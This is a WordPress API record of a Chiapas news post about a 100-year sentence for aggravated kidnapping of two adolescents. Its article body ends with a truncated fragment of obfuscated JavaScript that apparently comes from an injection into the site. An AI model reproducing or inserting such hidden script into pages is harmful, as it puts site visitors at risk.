{"id":25772,"date":"2025-12-13T04:42:12","date_gmt":"2025-12-13T04:42:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25772"},"modified":"2025-12-13T04:42:13","modified_gmt":"2025-12-13T04:42:13","slug":"poder-judicial-del-estado-impone-100-anos-de-prision-a-responsable-del-delito-de-secuestro-agravado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25772","title":{"rendered":"Poder Judicial del Estado impone 100 a\u00f1os de prisi\u00f3n a responsable del delito de Secuestro Agravado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000489966-1024x678.jpg\" alt=\"\" class=\"wp-image-25773\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000489966-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000489966-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000489966-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000489966-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000489966-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000489966-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>12 de diciembre del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria en contra de Antonio \u201cN\u201d por el delito de Secuestro Agravado, cometido en agravio de dos adolescentes, en la \u00e9poca de los hechos, con identidades reservadas.<\/p>\n\n\n\n<p>Tras el suceso ocurrido en el a\u00f1o 2019 en el municipio de Reforma, Chiapas, y derivado del desahogo de pruebas realizado durante las audiencias de juicio oral, se logr\u00f3 acreditar la participaci\u00f3n y responsabilidad penal del hoy sentenciado.<\/p>\n\n\n\n<p>En consecuencia, la persona juzgadora del Tribunal de Enjuiciamiento del distrito judicial de Pichucalco resolvi\u00f3 imponer a Antonio \u201cN&#8221; una pena de 100 a\u00f1os de prisi\u00f3n y al pago de la reparaci\u00f3n del da\u00f1o. As\u00ed mismo, se determin\u00f3 no concederle ning\u00fan sustitutivo de la pena impuesta.<\/p>\n\n\n\n<p>Con esta sentencia, el Poder Judicial del Estado, que preside el magistrado Juan Carlos Moreno Guill\u00e9n, refrenda su compromiso con una justicia m\u00e1s humana y accesible, que garantice que los delitos cometidos en agravio de las y los chiapanecos no queden impunes.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>12 de diciembre del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s de un Tribunal de Enjuiciamiento, dict\u00f3 sentencia condenatoria en contra de Antonio \u201cN\u201d por el delito de Secuestro Agravado, cometido en agravio de dos adolescentes, en la \u00e9poca de los hechos, con identidades reservadas. Tras el suceso ocurrido en el a\u00f1o &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25773,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-25772","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25772","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25772"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25772\/revisions"}],"predecessor-version":[{"id":25774,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25772\/revisions\/25774"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25773"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25772"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25772"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25772"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}